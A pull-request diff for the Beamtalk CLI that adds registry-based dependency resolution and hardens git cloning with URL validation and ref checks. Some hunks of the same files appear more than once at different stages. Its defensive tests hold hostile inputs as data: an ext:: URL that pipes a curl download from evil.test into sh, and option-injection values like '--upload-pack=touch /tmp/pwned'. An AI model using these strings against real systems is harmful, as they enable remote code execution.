### PR TITLE
Registry-based dependency resolution (`name = "X.Y.Z"` in beamtalk.toml) (BT-2978)

### DIFF
--- a/crates/beamtalk-cli/src/build_layout.rs
+++ b/crates/beamtalk-cli/src/build_layout.rs
@@ -131,6 +131,21 @@ impl BuildLayout {
     pub fn dep_stamp_path(&self, name: &str) -> Utf8PathBuf {
         self.dep_checkout_dir(name).join(".beamtalk-stamp.json")
     }
+
+    // ── Registry ─────────────────────────────────────────────────────
+
+    /// `_build/registry/` — package registry storage root.
+    pub fn registry_dir(&self) -> Utf8PathBuf {
+        self.build_root().join("registry")
+    }
+
+    /// `_build/registry/index/` — the cloned registry index checkout.
+    ///
+    /// Only used when the registry resolves to a git URL; a registry that
+    /// points at a local directory is read in place.
+    pub fn registry_index_dir(&self) -> Utf8PathBuf {
+        self.registry_dir().join("index")
+    }
 }
 
 #[cfg(test)]
@@ -236,6 +251,21 @@ mod tests {
         assert_eq!(
             layout.dep_stamp_path("utils"),
             "/home/user/my_app/_build/deps/utils/.beamtalk-stamp.json"
+        );
+    }
+
+    #[test]
+    fn test_registry_dir() {
+        let layout = BuildLayout::new("/home/user/my_app");
+        assert_eq!(layout.registry_dir(), "/home/user/my_app/_build/registry");
+    }
+
+    #[test]
+    fn test_registry_index_dir() {
+        let layout = BuildLayout::new("/home/user/my_app");
+        assert_eq!(
+            layout.registry_index_dir(),
+            "/home/user/my_app/_build/registry/index"
         );
     }
 }

--- a/crates/beamtalk-cli/src/commands/deps/cli.rs
+++ b/crates/beamtalk-cli/src/commands/deps/cli.rs
@@ -176,6 +176,7 @@ fn run_add(
             url: url.to_string(),
             reference,
             resolved_sha: resolved.resolved_sha.clone(),
+            registry_version: None,
         });
         lockfile.write(project_root)?;
 
@@ -318,6 +319,15 @@ fn run_list(project_root: &Utf8Path) -> Result<()> {
                     format!("(git: {short_url} {ref_str})")
                 }
             }
+            DependencySource::Registry { version } => {
+                if let Some(entry) = lockfile.get(dep_name) {
+                    let short_sha = &entry.resolved_sha[..7.min(entry.resolved_sha.len())];
+                    let short_url = shorten_git_url(&entry.url);
+                    format!("(registry: {version} -> {short_url} @ {short_sha})")
+                } else {
+                    format!("(registry: {version})")
+                }
+            }
         };
 
         max_name = max_name.max(dep_name.len());
@@ -339,7 +349,7 @@ fn dep_version(project_root: &Utf8Path, name: &str, source: &DependencySource) -
             let utf8 = Utf8PathBuf::from(path.to_string_lossy().to_string());
             project_root.join(&utf8)
         }
-        DependencySource::Git { .. } => {
+        DependencySource::Git { .. } | DependencySource::Registry { .. } => {
             crate::commands::build_layout::BuildLayout::new(project_root).dep_checkout_dir(name)
         }
     };
@@ -396,10 +406,19 @@ fn run_update(project_root: &Utf8Path, name: Option<&str>) -> Result<()> {
             miette::bail!("Dependency '{target_name}' not found in beamtalk.toml");
         }
         if !git_deps.contains_key(target_name) {
-            miette::bail!(
-                "Dependency '{target_name}' is a path dependency — \
-                 only git dependencies can be updated"
-            );
+            // Registry deps are pinned to an exact version in beamtalk.toml, so
+            // "updating" one means editing that version (BT-2979 adds
+            // first-class registry support to `deps update`).
+            let kind = match &manifest.dependencies[target_name].source {
+                DependencySource::Registry { version } => {
+                    format!(
+                        "is pinned to registry version {version} — edit the version in \
+                         beamtalk.toml to change it"
+                    )
+                }
+                _ => "is a path dependency — only git dependencies can be updated".to_string(),
+            };
+            miette::bail!("Dependency '{target_name}' {kind}");
         }
 
         let (url, reference) = git_deps[target_name];
@@ -454,6 +473,7 @@ fn update_single_git_dep(
         url: url.to_string(),
         reference: reference.clone(),
         resolved_sha: resolved.resolved_sha.clone(),
+        registry_version: None,
     });
     lockfile.write(project_root)?;
 

--- a/crates/beamtalk-cli/src/commands/deps/git.rs
+++ b/crates/beamtalk-cli/src/commands/deps/git.rs
@@ -151,14 +151,7 @@ fn clone_repo(name: &str, url: &str, target: &Utf8Path) -> Result<()> {
 /// Deliberately excludes git's `ext::` and `fd::` helper transports: `ext::`
 /// runs an arbitrary shell command, so a URL carrying it is code execution, not
 /// a fetch.
-const ALLOWED_URL_SCHEMES: &[&str] = &[
-    "https://",
-    "http://",
-    "ssh://",
-    "git://",
-    "file://",
-    "git+ssh://",
-];
+const ALLOWED_URL_SCHEMES: &[&str] = &["https://", "http://", "ssh://", "git://", "file://"];
 
 /// Reject dependency URLs that git would not treat as a plain remote.
 ///
@@ -202,10 +195,18 @@ pub fn validate_git_url(name: &str, url: &str) -> Result<()> {
 
     // `user@host:path` scp-style syntax has no scheme but is a normal git
     // remote. Accept it only when it really looks like one: a non-empty host
-    // segment before the first colon that carries no slash.
-    let scp_like = url
-        .split_once(':')
-        .is_some_and(|(host, _)| !host.is_empty() && !host.contains('/'));
+    // segment before the first colon that carries no slash, and a path that
+    // does not begin with `//`.
+    //
+    // That last condition is what keeps an unrecognised *scheme* out. Without
+    // it `badscheme://host/repo` splits into ("badscheme", "//host/repo") and
+    // reads as scp-style, and git would go looking for `git-remote-badscheme`
+    // on PATH — `protocol.ext.allow=never` only disables the built-in `ext::`
+    // helper, not arbitrary installed transport programs. A real scp-style
+    // path never starts with `//`.
+    let scp_like = url.split_once(':').is_some_and(|(host, path)| {
+        !host.is_empty() && !host.contains('/') && !path.starts_with("//")
+    });
 
     if !scp_like {
         miette::bail!(
@@ -633,6 +634,19 @@ mod tests {
     fn test_validate_git_url_rejects_other_transport_helpers() {
         assert!(validate_git_url("dep", "fd::7").is_err());
         assert!(validate_git_url("dep", "transport::whatever").is_err());
+    }
+
+    #[test]
+    fn test_validate_git_url_rejects_unknown_scheme() {
+        // Would otherwise read as scp-style and send git looking for
+        // `git-remote-<scheme>` on PATH.
+        for url in [
+            "gitremote://evil.test/repo",
+            "badscheme://host/repo",
+            "git+ssh://host/repo",
+        ] {
+            assert!(validate_git_url("dep", url).is_err(), "should reject {url}");
+        }
     }
 
     #[test]

--- a/crates/beamtalk-cli/src/commands/deps/git.rs
+++ b/crates/beamtalk-cli/src/commands/deps/git.rs
@@ -355,6 +355,7 @@ mod tests {
             url: url.clone(),
             reference: GitReference::Tag("v1.0.0".to_string()),
             resolved_sha: expected_sha.clone(),
+            registry_version: None,
         };
 
         let result2 = resolve_git_dep(
@@ -397,6 +398,7 @@ mod tests {
             url: url.clone(),
             reference: GitReference::Tag("v1.0.0".to_string()),
             resolved_sha: "deadbeefdeadbeefdeadbeefdeadbeefdeadbeef".to_string(),
+            registry_version: None,
         };
 
         let result2 = resolve_git_dep(

--- a/crates/beamtalk-cli/src/commands/deps/git.rs
+++ b/crates/beamtalk-cli/src/commands/deps/git.rs
@@ -55,8 +55,16 @@ pub fn resolve_git_dep(
     let deps_dir = crate::commands::build_layout::BuildLayout::new(project_root).deps_dir();
     let checkout_path = deps_dir.join(name);
 
-    // Check if we can skip re-clone based on lockfile
-    if let Some(entry) = lock_entry {
+    // Check if we can skip re-clone based on lockfile.
+    //
+    // A lock entry pins a SHA for one specific (url, reference) request, so it
+    // only licenses skipping the clone while the manifest still asks for that
+    // same request. Once `beamtalk.toml` names a different tag/branch/rev — or
+    // a different repository — the pin no longer describes what was asked for,
+    // and reusing it would silently keep building the previously locked commit.
+    // (A *matching* reference still reuses the pinned SHA: that is what makes
+    // a locked branch dependency reproducible until `deps update`.)
+    if let Some(entry) = lock_entry.filter(|e| e.url == url && e.reference == *reference) {
         if checkout_path.exists() && verify_checkout(name, &checkout_path, &entry.resolved_sha) {
             info!(name, sha = %entry.resolved_sha, "Git dependency up-to-date, skipping clone");
             return Ok(ResolvedGitDep {
@@ -103,9 +111,25 @@ pub fn resolve_git_dep(
 }
 
 /// Clone a git repository to the given path.
+///
+/// The URL is passed after `--` and screened by [`validate_git_url`] so it can
+/// never be read as a git option, and the `ext::` transport — which executes an
+/// arbitrary shell command — is disabled for the duration of the clone. Both
+/// matter because a registry dependency's URL comes from the registry index
+/// rather than from the user's own `beamtalk.toml`.
 fn clone_repo(name: &str, url: &str, target: &Utf8Path) -> Result<()> {
+    validate_git_url(name, url)?;
+
     let output = Command::new("git")
-        .args(["clone", "--quiet", url, target.as_str()])
+        .args([
+            "-c",
+            "protocol.ext.allow=never",
+            "clone",
+            "--quiet",
+            "--",
+            url,
+            target.as_str(),
+        ])
         .output()
         .into_diagnostic()
         .wrap_err_with(|| format!("Failed to execute 'git clone' for dependency '{name}'"))?;
@@ -116,6 +140,78 @@ fn clone_repo(name: &str, url: &str, target: &Utf8Path) -> Result<()> {
             "Failed to clone git dependency '{name}' from '{url}'\n\n\
              git clone failed:\n{stderr}\n\n\
              Check that the URL is correct and accessible."
+        );
+    }
+
+    Ok(())
+}
+
+/// Transports a dependency URL may legitimately use.
+///
+/// Deliberately excludes git's `ext::` and `fd::` helper transports: `ext::`
+/// runs an arbitrary shell command, so a URL carrying it is code execution, not
+/// a fetch.
+const ALLOWED_URL_SCHEMES: &[&str] = &[
+    "https://",
+    "http://",
+    "ssh://",
+    "git://",
+    "file://",
+    "git+ssh://",
+];
+
+/// Reject dependency URLs that git would not treat as a plain remote.
+///
+/// Registry dependencies take their URL from the registry index — third-party
+/// data — so this runs on every clone rather than trusting the manifest author.
+///
+/// # Errors
+///
+/// Returns an error if the URL is empty, looks like a command-line option, or
+/// uses a transport outside [`ALLOWED_URL_SCHEMES`].
+pub fn validate_git_url(name: &str, url: &str) -> Result<()> {
+    if url.trim().is_empty() {
+        miette::bail!("Dependency '{name}' has an empty git URL");
+    }
+
+    if url.starts_with('-') {
+        miette::bail!(
+            "Dependency '{name}' has an invalid git URL '{url}' — \
+             a URL may not begin with '-' (it would be read as a git option)."
+        );
+    }
+
+    if ALLOWED_URL_SCHEMES
+        .iter()
+        .any(|scheme| url.starts_with(scheme))
+    {
+        return Ok(());
+    }
+
+    // Anything of the form `<helper>::<address>` is git's transport-helper
+    // syntax, which dispatches to `git-remote-<helper>` — `ext::` being the
+    // shell-executing one. None of the allowed schemes reach here, so a `::`
+    // at this point can only be a helper invocation.
+    if url.contains("::") {
+        miette::bail!(
+            "Dependency '{name}' has an unsupported git URL '{url}'.\n\n  \
+             '<transport>::' URLs are rejected: git dispatches them to a remote \
+             helper, and 'ext::' in particular executes an arbitrary command."
+        );
+    }
+
+    // `user@host:path` scp-style syntax has no scheme but is a normal git
+    // remote. Accept it only when it really looks like one: a non-empty host
+    // segment before the first colon that carries no slash.
+    let scp_like = url
+        .split_once(':')
+        .is_some_and(|(host, _)| !host.is_empty() && !host.contains('/'));
+
+    if !scp_like {
+        miette::bail!(
+            "Dependency '{name}' has an unsupported git URL '{url}'.\n\n  \
+             Supported forms are https://, http://, ssh://, git://, file://, \
+             and user@host:path."
         );
     }
 
@@ -413,6 +509,159 @@ mod tests {
         assert_eq!(result2.resolved_sha, expected_sha);
         // Marker file should be gone (directory was re-created)
         assert!(!marker.exists(), "Should have re-cloned");
+    }
+
+    /// Changing the requested ref in `beamtalk.toml` must refetch, even though
+    /// the old checkout still matches the old lockfile SHA.
+    ///
+    /// Regression: the skip-clone check only compared the recorded SHA against
+    /// the checkout's HEAD, never the *requested* reference — so bumping a tag
+    /// silently kept building the previously locked commit.
+    #[test]
+    fn test_reclone_when_requested_ref_differs_from_lock() {
+        let (_repo, url, expected_sha) = create_test_repo();
+        let project_dir = TempDir::new().unwrap();
+        let project_root = Utf8PathBuf::from_path_buf(project_dir.path().to_path_buf()).unwrap();
+
+        let result = resolve_git_dep(
+            "test_dep",
+            &url,
+            &GitReference::Tag("v1.0.0".to_string()),
+            &project_root,
+            None,
+        )
+        .unwrap();
+
+        let marker = result.checkout_path.join(".test_marker");
+        std::fs::write(&marker, "present").unwrap();
+
+        // The lock still pins the tag, but the manifest now asks for a branch.
+        let lock_entry = LockEntry {
+            name: "test_dep".to_string(),
+            url: url.clone(),
+            reference: GitReference::Tag("v1.0.0".to_string()),
+            resolved_sha: expected_sha.clone(),
+            registry_version: None,
+        };
+
+        let result2 = resolve_git_dep(
+            "test_dep",
+            &url,
+            &GitReference::Branch("develop".to_string()),
+            &project_root,
+            Some(&lock_entry),
+        )
+        .unwrap();
+
+        assert_eq!(result2.resolved_sha, expected_sha);
+        assert!(
+            !marker.exists(),
+            "A changed reference must force a re-clone"
+        );
+    }
+
+    /// The same applies to the repository URL: a lock entry for a different
+    /// remote must not license reusing the checkout.
+    #[test]
+    fn test_reclone_when_requested_url_differs_from_lock() {
+        let (_repo, url, expected_sha) = create_test_repo();
+        let project_dir = TempDir::new().unwrap();
+        let project_root = Utf8PathBuf::from_path_buf(project_dir.path().to_path_buf()).unwrap();
+
+        let result = resolve_git_dep(
+            "test_dep",
+            &url,
+            &GitReference::Tag("v1.0.0".to_string()),
+            &project_root,
+            None,
+        )
+        .unwrap();
+
+        let marker = result.checkout_path.join(".test_marker");
+        std::fs::write(&marker, "present").unwrap();
+
+        let lock_entry = LockEntry {
+            name: "test_dep".to_string(),
+            url: "file:///some/other/repo".to_string(),
+            reference: GitReference::Tag("v1.0.0".to_string()),
+            resolved_sha: expected_sha.clone(),
+            registry_version: None,
+        };
+
+        let result2 = resolve_git_dep(
+            "test_dep",
+            &url,
+            &GitReference::Tag("v1.0.0".to_string()),
+            &project_root,
+            Some(&lock_entry),
+        )
+        .unwrap();
+
+        assert_eq!(result2.resolved_sha, expected_sha);
+        assert!(!marker.exists(), "A changed URL must force a re-clone");
+    }
+
+    // ── URL validation ───────────────────────────────────────────────
+    //
+    // A registry dependency's URL comes from the registry index, so these are
+    // supply-chain guards, not just typo protection.
+
+    #[test]
+    fn test_validate_git_url_accepts_normal_remotes() {
+        for url in [
+            "https://github.com/jamesc/beamtalk-json",
+            "http://example.test/repo.git",
+            "ssh://git@example.test/repo.git",
+            "git://example.test/repo.git",
+            "file:///tmp/repo",
+            "git@github.com:jamesc/beamtalk-json.git",
+        ] {
+            assert!(validate_git_url("dep", url).is_ok(), "should accept {url}");
+        }
+    }
+
+    #[test]
+    fn test_validate_git_url_rejects_ext_transport() {
+        // `ext::` makes git run an arbitrary command — remote code execution
+        // if it reaches `git clone`.
+        let err = validate_git_url("dep", "ext::sh -c 'curl evil.test/x.sh|sh'").unwrap_err();
+        let msg = format!("{err:?}");
+        assert!(msg.contains("unsupported git URL"), "{msg}");
+    }
+
+    #[test]
+    fn test_validate_git_url_rejects_other_transport_helpers() {
+        assert!(validate_git_url("dep", "fd::7").is_err());
+        assert!(validate_git_url("dep", "transport::whatever").is_err());
+    }
+
+    #[test]
+    fn test_validate_git_url_rejects_option_lookalike() {
+        // Sits in a positional slot, so git would parse it as an option.
+        let err = validate_git_url("dep", "--upload-pack=touch /tmp/pwned").unwrap_err();
+        let msg = format!("{err:?}");
+        assert!(msg.contains("may not begin with"), "{msg}");
+    }
+
+    #[test]
+    fn test_validate_git_url_rejects_empty() {
+        assert!(validate_git_url("dep", "  ").is_err());
+    }
+
+    #[test]
+    fn test_resolve_git_dep_rejects_dangerous_url() {
+        let project_dir = TempDir::new().unwrap();
+        let project_root = Utf8PathBuf::from_path_buf(project_dir.path().to_path_buf()).unwrap();
+
+        let result = resolve_git_dep(
+            "evil",
+            "ext::sh -c 'touch /tmp/beamtalk_pwned'",
+            &GitReference::Tag("v1.0.0".to_string()),
+            &project_root,
+            None,
+        );
+
+        assert!(result.is_err(), "dangerous URL must not reach git clone");
     }
 
     #[test]

--- a/crates/beamtalk-cli/src/commands/deps/git.rs
+++ b/crates/beamtalk-cli/src/commands/deps/git.rs
@@ -236,6 +236,17 @@ fn checkout_ref(name: &str, reference: &GitReference, repo_path: &Utf8Path) -> R
         GitReference::Rev(rev) => rev.clone(),
     };
 
+    // `git checkout` has no end-of-options marker that works with `--detach`
+    // (`--` marks pathspecs, not a commit-ish), so reject option-looking targets
+    // outright. Only `Rev` can reach this — tags and branches are prefixed above.
+    if checkout_target.starts_with('-') {
+        miette::bail!(
+            "Invalid {ref_type} '{ref_value}' for dependency '{name}'\n\n\
+             A git reference must not start with '-'; git would read it as an option.\n\n\
+             Check the {ref_type} in your beamtalk.toml."
+        );
+    }
+
     let output = Command::new("git")
         .args(["checkout", "--quiet", "--detach", &checkout_target])
         .current_dir(repo_path)
@@ -424,6 +435,28 @@ mod tests {
         .unwrap();
 
         assert_eq!(result.resolved_sha, expected_sha);
+    }
+
+    #[test]
+    fn test_rev_starting_with_dash_is_rejected() {
+        let (_repo, url, _sha) = create_test_repo();
+        let project_dir = TempDir::new().unwrap();
+        let project_root = Utf8PathBuf::from_path_buf(project_dir.path().to_path_buf()).unwrap();
+
+        let err = resolve_git_dep(
+            "test_dep",
+            &url,
+            &GitReference::Rev("--exec=touch owned".to_string()),
+            &project_root,
+            None,
+        )
+        .unwrap_err()
+        .to_string();
+
+        assert!(
+            err.contains("must not start with '-'"),
+            "unexpected error: {err}"
+        );
     }
 
     #[test]

--- a/crates/beamtalk-cli/src/commands/deps/graph.rs
+++ b/crates/beamtalk-cli/src/commands/deps/graph.rs
@@ -1195,7 +1195,10 @@ middle = {{ path = "{middle_str}" }}"#
             "my_app",
             "0.1.0",
             &format!(
-                "[registry]\nurl = \"{index_root}\"\n\n[dependencies]\n{dep_name} = \"{version}\"\n"
+                // A TOML *literal* string: a Windows temp path contains
+                // backslashes, and `\U` in a basic string is a unicode escape
+                // (BT-1737's `file://` handling has the same hazard).
+                "[registry]\nurl = '{index_root}'\n\n[dependencies]\n{dep_name} = \"{version}\"\n"
             ),
         );
     }
@@ -1467,7 +1470,7 @@ middle = {{ path = "{middle_str}" }}"#
             "my_app",
             "0.1.0",
             &format!(
-                "[registry]\nurl = \"{index_root}\"\n\n\
+                "[registry]\nurl = '{index_root}'\n\n\
                  [dependencies]\nmiddle = {{ path = \"../middle\" }}\n"
             ),
         );

--- a/crates/beamtalk-cli/src/commands/deps/graph.rs
+++ b/crates/beamtalk-cli/src/commands/deps/graph.rs
@@ -85,7 +85,10 @@ pub fn resolve_dependency_graph(
         // The registry is a property of the project being built, so the root
         // manifest's `[registry]` governs the whole graph — a transitive
         // dependency cannot redirect resolution to a registry of its own.
-        registry_location: registry::resolve_registry_location(root_manifest.registry.as_ref()),
+        registry_location: registry::resolve_registry_location(
+            project_root,
+            root_manifest.registry.as_ref(),
+        ),
     };
 
     discover_deps(&mut ctx, project_root, &root_name, &root_manifest)?;
@@ -300,14 +303,21 @@ fn resolve_registry_dep(
     version: &str,
     parent_name: &str,
 ) -> Result<Utf8PathBuf> {
-    let lock_entry = ctx.lockfile.get(dep_name);
+    let locked = ctx.lockfile.get(dep_name);
 
     // Fast path: the lockfile already pins this exact version, so we can go
     // straight to the git checkout without reading (or fetching) the index.
-    let (url, reference) = match lock_entry {
+    //
+    // The lock entry is forwarded to `resolve_git_dep` *only* on that hit.
+    // On a miss the entry is deliberately dropped: it pins the previously
+    // resolved SHA, and `resolve_git_dep` reuses an existing checkout whose
+    // HEAD matches that SHA without looking at the reference we pass. Keeping
+    // it across a version bump would leave the old version checked out while
+    // we believe we fetched the new tag.
+    let (url, reference, lock_entry) = match locked {
         Some(entry) if entry.registry_version.as_deref() == Some(version) => {
             debug!(dep = %dep_name, version, "Registry dependency satisfied from lockfile");
-            (entry.url.clone(), entry.reference.clone())
+            (entry.url.clone(), entry.reference.clone(), locked)
         }
         _ => {
             let release = registry::resolve_release(
@@ -322,7 +332,7 @@ fn resolve_registry_dep(
                              (required by '{parent_name}')"
                 )
             })?;
-            (release.git, GitReference::Tag(release.tag))
+            (release.git, GitReference::Tag(release.tag), None)
         }
     };
 
@@ -1292,6 +1302,90 @@ middle = {{ path = "{middle_str}" }}"#
         );
     }
 
+    /// A git repo carrying two released versions, each with its own tag and a
+    /// `beamtalk.toml` declaring that version.
+    fn create_two_version_repo(pkg_name: &str) -> (TempDir, String) {
+        let dir = TempDir::new().unwrap();
+        let path = dir.path();
+
+        run_git_cmd(path, &["init"]);
+        run_git_cmd(path, &["config", "user.email", "test@test.com"]);
+        run_git_cmd(path, &["config", "user.name", "Test"]);
+        run_git_cmd(path, &["config", "commit.gpgsign", "false"]);
+
+        write_manifest(path, pkg_name, "1.0.0", "");
+        run_git_cmd(path, &["add", "."]);
+        run_git_cmd(path, &["commit", "-m", "v1"]);
+        run_git_cmd(path, &["tag", "-m", "v1.0.0", "v1.0.0"]);
+
+        write_manifest(path, pkg_name, "2.0.0", "");
+        run_git_cmd(path, &["add", "."]);
+        run_git_cmd(path, &["commit", "-m", "v2"]);
+        run_git_cmd(path, &["tag", "-m", "v2.0.0", "v2.0.0"]);
+
+        let mut path_str = path.display().to_string().replace('\\', "/");
+        if !path_str.starts_with('/') {
+            path_str.insert(0, '/');
+        }
+        (dir, format!("file://{path_str}"))
+    }
+
+    /// Bumping the version in `beamtalk.toml` must re-checkout the new tag.
+    ///
+    /// Regression: the stale lock entry was forwarded to `resolve_git_dep`,
+    /// which reuses a checkout whose HEAD matches the locked SHA regardless of
+    /// the reference asked for — leaving the old version on disk.
+    #[test]
+    fn test_registry_dep_version_bump_refetches_checkout() {
+        let (_git_dir, url) = create_two_version_repo("my_pkg");
+        let (_index_dir, index_root) = create_registry_index(
+            "my_pkg",
+            &format!(
+                "[[versions]]\nversion = \"1.0.0\"\ngit = \"{url}\"\n\
+                 [[versions]]\nversion = \"2.0.0\"\ngit = \"{url}\"\n"
+            ),
+        );
+
+        let root_dir = TempDir::new().unwrap();
+        let root = root_dir.path().join("root");
+        write_registry_project(&root, &index_root, "my_pkg", "1.0.0");
+        let root_path = Utf8PathBuf::from_path_buf(root.clone()).unwrap();
+        let options = beamtalk_core::CompilerOptions::default();
+
+        resolve_dependency_graph(&root_path, &options).unwrap();
+        let checkout_manifest = crate::commands::build_layout::BuildLayout::new(&root_path)
+            .dep_checkout_dir("my_pkg")
+            .join("beamtalk.toml");
+        assert!(
+            fs::read_to_string(&checkout_manifest)
+                .unwrap()
+                .contains("version = \"1.0.0\""),
+            "first resolve should check out 1.0.0"
+        );
+
+        // Bump the manifest to 2.0.0 and re-resolve.
+        write_registry_project(&root, &index_root, "my_pkg", "2.0.0");
+        resolve_dependency_graph(&root_path, &options)
+            .expect("version bump should re-resolve cleanly");
+
+        assert!(
+            fs::read_to_string(&checkout_manifest)
+                .unwrap()
+                .contains("version = \"2.0.0\""),
+            "the checkout must be updated to the newly requested version"
+        );
+
+        let lock = Lockfile::read(&root_path).unwrap().unwrap();
+        assert_eq!(
+            lock.get("my_pkg").unwrap().registry_version.as_deref(),
+            Some("2.0.0")
+        );
+        assert_eq!(
+            lock.get("my_pkg").unwrap().reference,
+            GitReference::Tag("v2.0.0".to_string())
+        );
+    }
+
     #[test]
     fn test_registry_dep_version_mismatch_is_an_error() {
         // The repo's package declares 0.1.0, but the index advertises the same
@@ -1338,6 +1432,62 @@ middle = {{ path = "{middle_str}" }}"#
             .collect::<Vec<_>>()
             .join(" ");
         assert!(msg.contains("Available versions: 1.0.0"), "{msg}");
+    }
+
+    /// A transitive registry dependency resolves through the *root* project's
+    /// registry — a dependency cannot redirect resolution to a registry of its
+    /// own, which would let a package choose where its own deps come from.
+    #[test]
+    fn test_transitive_registry_dep_uses_root_registry() {
+        let (_git_dir, url, _sha) = create_git_dep_repo("leaf_pkg", "1.0.0", "");
+        let (_index_dir, index_root) = create_registry_index(
+            "leaf_pkg",
+            &format!("[[versions]]\nversion = \"1.0.0\"\ngit = \"{url}\"\n"),
+        );
+
+        let workspace = TempDir::new().unwrap();
+
+        // The intermediate path dep declares the registry dep, and points at a
+        // registry that does not exist — it must be ignored.
+        let middle = workspace.path().join("middle");
+        fs::create_dir_all(&middle).unwrap();
+        write_manifest(
+            &middle,
+            "middle",
+            "0.1.0",
+            "[registry]\nurl = \"https://nonexistent.invalid/registry\"\n\n\
+             [dependencies]\nleaf_pkg = \"1.0.0\"\n",
+        );
+        write_source(&middle, "middle.bt", "Object subclass: Middle\n");
+
+        let root = workspace.path().join("root");
+        fs::create_dir_all(&root).unwrap();
+        write_manifest(
+            &root,
+            "my_app",
+            "0.1.0",
+            &format!(
+                "[registry]\nurl = \"{index_root}\"\n\n\
+                 [dependencies]\nmiddle = {{ path = \"../middle\" }}\n"
+            ),
+        );
+
+        let root_path = Utf8PathBuf::from_path_buf(root).unwrap();
+        let resolved =
+            resolve_dependency_graph(&root_path, &beamtalk_core::CompilerOptions::default())
+                .expect("root registry should govern the whole graph");
+
+        let names: Vec<&str> = resolved.iter().map(|r| r.name.as_str()).collect();
+        assert!(
+            names.contains(&"leaf_pkg"),
+            "transitive registry dep should resolve: {names:?}"
+        );
+        assert!(names.contains(&"middle"), "{names:?}");
+
+        // Leaves compile before the package that depends on them.
+        let leaf_at = names.iter().position(|n| *n == "leaf_pkg").unwrap();
+        let middle_at = names.iter().position(|n| *n == "middle").unwrap();
+        assert!(leaf_at < middle_at, "wrong compilation order: {names:?}");
     }
 
     #[test]

--- a/crates/beamtalk-cli/src/commands/deps/graph.rs
+++ b/crates/beamtalk-cli/src/commands/deps/graph.rs
@@ -10,7 +10,7 @@
 //! (leaves first). Detects circular dependencies and enforces the single-version
 //! policy (each package name may appear at most once in the resolved graph).
 
-use beamtalk_core::compilation::DependencySource;
+use beamtalk_core::compilation::{DependencySource, GitReference};
 use camino::{Utf8Path, Utf8PathBuf};
 use miette::{Context, Result};
 use std::collections::{BTreeMap, HashMap};
@@ -19,6 +19,7 @@ use tracing::{debug, info};
 use crate::commands::manifest::{self, ParsedManifest};
 
 use super::lockfile::{LockEntry, Lockfile};
+use super::registry::{self, RegistryLocation};
 
 use super::path::{ResolvedDependency, canonicalize_dep_path};
 
@@ -74,31 +75,30 @@ pub fn resolve_dependency_graph(
     let lockfile = Lockfile::read(project_root)?.unwrap_or_default();
 
     // Phase 1: Discover the full dependency graph
-    // Newly resolved git deps are collected so we can update the lockfile.
+    // Newly resolved git/registry deps are collected so we can update the lockfile.
     let mut ctx = DiscoveryContext {
         project_root,
         graph: BTreeMap::new(),
         discovery_stack: vec![root_name.clone()],
         lockfile: &lockfile,
-        new_git_resolutions: Vec::new(),
+        new_lock_entries: Vec::new(),
+        // The registry is a property of the project being built, so the root
+        // manifest's `[registry]` governs the whole graph — a transitive
+        // dependency cannot redirect resolution to a registry of its own.
+        registry_location: registry::resolve_registry_location(root_manifest.registry.as_ref()),
     };
 
     discover_deps(&mut ctx, project_root, &root_name, &root_manifest)?;
 
     // Extract results from context (drops the lockfile borrow)
     let graph = ctx.graph;
-    let new_git_resolutions = ctx.new_git_resolutions;
+    let new_lock_entries = ctx.new_lock_entries;
 
-    // Update lockfile with any newly resolved git deps
-    if !new_git_resolutions.is_empty() {
+    // Update lockfile with any newly resolved git/registry deps
+    if !new_lock_entries.is_empty() {
         let mut lockfile = lockfile;
-        for resolved in &new_git_resolutions {
-            lockfile.insert(LockEntry {
-                name: resolved.name.clone(),
-                url: resolved.url.clone(),
-                reference: resolved.reference.clone(),
-                resolved_sha: resolved.resolved_sha.clone(),
-            });
+        for entry in new_lock_entries {
+            lockfile.insert(entry);
         }
         lockfile.write(project_root)?;
     }
@@ -199,7 +199,11 @@ struct DiscoveryContext<'a> {
     graph: BTreeMap<String, DepNode>,
     discovery_stack: Vec<String>,
     lockfile: &'a Lockfile,
-    new_git_resolutions: Vec<super::git::ResolvedGitDep>,
+    /// Lock entries produced during this walk, written back once discovery
+    /// completes.
+    new_lock_entries: Vec<LockEntry>,
+    /// Where registry dependencies resolve from, taken from the root manifest.
+    registry_location: RegistryLocation,
 }
 
 /// Recursively discover dependencies by walking manifests.
@@ -251,7 +255,13 @@ fn discover_deps(
                     )
                 })?;
                 let checkout_root = resolved.checkout_path.clone();
-                ctx.new_git_resolutions.push(resolved);
+                ctx.new_lock_entries.push(LockEntry {
+                    name: resolved.name.clone(),
+                    url: resolved.url.clone(),
+                    reference: resolved.reference.clone(),
+                    resolved_sha: resolved.resolved_sha.clone(),
+                    registry_version: None,
+                });
 
                 discover_single_dep(
                     ctx,
@@ -261,8 +271,118 @@ fn discover_deps(
                     parent_name,
                 )?;
             }
+            DependencySource::Registry { version } => {
+                let checkout_root = resolve_registry_dep(ctx, dep_name, version, parent_name)?;
+
+                discover_single_dep(
+                    ctx,
+                    dep_name,
+                    &checkout_root,
+                    &format!("registry: {version}"),
+                    parent_name,
+                )?;
+            }
         }
     }
+    Ok(())
+}
+
+/// Resolve a registry dependency to an on-disk checkout.
+///
+/// Takes the `(git url, tag)` straight from the lockfile when it already
+/// records this exact version — so a locked build never touches the registry
+/// index. Otherwise the index is consulted, then the release is fetched
+/// through the ordinary git machinery and the checked-out package's own
+/// declared version is validated against the request.
+fn resolve_registry_dep(
+    ctx: &mut DiscoveryContext<'_>,
+    dep_name: &str,
+    version: &str,
+    parent_name: &str,
+) -> Result<Utf8PathBuf> {
+    let lock_entry = ctx.lockfile.get(dep_name);
+
+    // Fast path: the lockfile already pins this exact version, so we can go
+    // straight to the git checkout without reading (or fetching) the index.
+    let (url, reference) = match lock_entry {
+        Some(entry) if entry.registry_version.as_deref() == Some(version) => {
+            debug!(dep = %dep_name, version, "Registry dependency satisfied from lockfile");
+            (entry.url.clone(), entry.reference.clone())
+        }
+        _ => {
+            let release = registry::resolve_release(
+                ctx.project_root,
+                &ctx.registry_location,
+                dep_name,
+                version,
+            )
+            .wrap_err_with(|| {
+                format!(
+                    "Failed to resolve registry dependency '{dep_name}' \
+                             (required by '{parent_name}')"
+                )
+            })?;
+            (release.git, GitReference::Tag(release.tag))
+        }
+    };
+
+    let resolved =
+        super::git::resolve_git_dep(dep_name, &url, &reference, ctx.project_root, lock_entry)
+            .wrap_err_with(|| {
+                format!(
+                    "Failed to fetch registry dependency '{dep_name}' {version} \
+             (required by '{parent_name}')"
+                )
+            })?;
+
+    validate_checkout_version(dep_name, version, &resolved.checkout_path, &url, &reference)?;
+
+    let checkout_root = resolved.checkout_path.clone();
+    ctx.new_lock_entries.push(LockEntry {
